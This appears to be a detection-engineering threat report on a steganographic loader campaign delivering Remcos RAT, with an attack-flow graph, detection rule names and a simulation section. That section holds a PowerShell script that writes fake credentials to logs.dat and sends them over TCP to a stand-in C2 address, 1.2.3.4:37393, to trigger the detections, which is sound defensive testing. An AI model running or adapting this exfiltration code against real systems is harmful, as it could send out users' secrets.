Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A multi-stage malware campaign relies on steganography and in-memory execution to deliver multiple payloads, including Remcos RAT. The infection chain starts with a phishing email carrying a malicious archive that drops a .NET executable. That executable uses embedded resources and steganographic methods to load later stages directly into memory, helping the malware avoid disk-based detection.
Investigation
The investigation began after telemetry flagged a suspicious file named GST Debit Note Apr_26.com. Analysts determined that the file was a packed 32-bit .NET executable disguised as a game. Further reverse engineering revealed steganography embedded in a .NET Bitmap object, which concealed the next-stage loader, Optimax.dll, and allowed it to run fully in memory.
Mitigation
Organizations should deploy strong email filtering to block suspicious archive attachments and phishing attempts. EDR solutions should be capable of detecting in-memory execution, process hollowing, and suspicious PowerShell behavior. Teams should also monitor for unauthorized registry changes, especially in Run keys, and enforce strict application control to prevent unsigned executables from launching.
Response
Affected endpoints should be isolated immediately to limit lateral movement and data theft. Investigators should perform memory forensics to identify fileless components and confirm the presence of the Remcos_Mutex_Inj mutex. A full sweep should also check for unauthorized persistence in the AppData directory and registry Run keys, while credentials should be reset for any users whose browsers may have been accessed by the malware.
graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff99cc classDef technique fill:#c2f0c2 classDef file fill:#e1e1e1 %% Node Definitions %% Initial Access attack_phishing[“<b>Action</b> – <b idea=’T1566.001’>Phishing: Spearphishing Attachment</b><br/><b>Details</b>: Malicious archive GST Debit Note Apr_26.com sent to victims.”] class attack_phishing action %% Evasion and Loader Stage 1 evasion_stego[“<b idea=’T1027.003’>Obfuscated Files or Information: Steganography</b><br/><b>Details</b>: Hiding Optimax.dll inside a serialized .NET Bitmap object<br/>within the executable resource section.”] class evasion_stego technique exec_appdomain[“<b idea=’T1574.014’>Hijack Execution Flow: AppDomainManager</b><br/><b>Details</b>: Using reflection and AppDomain.Load to execute<br/>payload directly from memory without touching disk.”] class exec_appdomain technique %% Second Stage loader_stage2[“<b idea=’T1055.012’>Process Injection: Process Hollowing</b><br/><b>Details</b>: System Optimizer Ultimate.dll deploys final payload<br/>by hollowing a default browser process.”] class loader_stage2 technique malware_remcos[“<b idea=’Malware’>Remcos RAT</b><br/><b>Description</b>: Remote Access Trojan deployed<br/>as the final payload.”] class malware_remcos malware %% Persistence and Evasion evasion_sandbox[“<b idea=’T1497’>Virtualization/Sandbox Evasion</b><br/><b>Details</b>: Checking for sbiedll.dll and registry keys<br/>to detect sandboxes or virtual machines.”] class evasion_sandbox technique persistence_active[“<b idea=’T1547.014’>Boot or Logon Autostart Execution: Active Setup</b><br/><b>Details</b>: Copying malware to AppData\Roaming and<br/>configuring a Run registry key for persistence.”] class persistence_active technique %% Collection and Exfiltration collect_browser[“<b idea=’T1217’>Browser Information Discovery</b><br/><b>Details</b>: Collecting Chrome and Firefox credentials.”] class collect_browser technique steal_cookies[“<b idea=’T1539’>Steal Web Session Cookie</b><br/><b>Details</b>: Capturing active web session cookies.”] class steal_cookies technique exfil_c2[“<b idea=’T1041’>Exfiltration Over C2 Channel</b><br/><b>Details</b>: Sending captured data from logs.dat<br/>to the attacker via Command and Control.”] class exfil_c2 technique file_logs[“<b idea=’File’>logs.dat</b><br/><b>Description</b>: Local file used to store<br/>stolen credentials and cookies.”] class file_logs file %% Connections %% Flow of attack attack_phishing –>|leads_to| evasion_stego evasion_stego –>|unpacks| exec_appdomain exec_appdomain –>|loads| loader_stage2 loader_stage2 –>|deploys| malware_remcos %% Malware actions malware_remcos –>|performs| evasion_sandbox malware_remcos –>|establishes| persistence_active malware_remcos –>|performs| collect_browser collect_browser –>|leads_to| steal_cookies steal_cookies –>|saves_to| file_logs file_logs –>|sent_via| exfil_c2
Attack Flow
Detections
Call Suspicious .NET Methods from Powershell (via powershell)
View
Possible Persistence Points [ASEPs – Software/NTUSER Hive] (via registry_event)
View
The Possibility of Execution Through Hidden PowerShell Command Lines (via cmdline)
View
Possible Powershell Obfuscation Indicators (via powershell)
View
Exfiltration of Captured Data to Command and Control [Windows Network Connection]
View
Execution of Obfuscated PowerShell Script in Steganographic Loader Campaign [Windows Powershell]
View
Detection of Remcos RAT Infection via Steganographic and Fileless Techniques [Windows Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands: The adversary has successfully established a foothold. To complete the objective, they collect system telemetry and stash it in a file named
logs.datto masquerade as standard system logs. The adversary then initiates a network connection to the established C2 infrastructure (using the IP1.2.3.4and port37393for this simulation) to exfiltrate the data. This mimics the behavior of a steganographic loader attempting to move data out of the network via a specific, hardcoded channel. -
Regression Test Script:
# Simulation of Data Exfiltration via specific filename and C2 parameters $C2_IP = "1.2.3.4" # Simulated C2 IP $C2_PORT = 37393 $FILENAME = "logs.dat" # 1. Create the 'malicious' data file Write-Output "Sensitive Data: UserCredentials_Admin_Pass123" | Out-File -FilePath "$env:TEMP$FILENAME" # 2. Simulate the network connection to the C2 # Using a TCP Client to force the specific port/IP telemetry try { $client = New-Object System.Net.Sockets.TcpClient($C2_IP, $C2_PORT) $stream = $client.GetStream() $data = [System.Text.Encoding]::ASCII.GetBytes((Get-Content "$env:TEMP$FILENAME")) $stream.Write($data, 0, $data.Length) $client.Close() } catch { Write-Host "Connection failed (Expected if IP is non-existent), but telemetry should be captured by the firewall." } -
Cleanup Commands:
# Remove the simulated malicious file Remove-Item -Path "$env:TEMPlogs.dat" -ErrorAction SilentlyContinue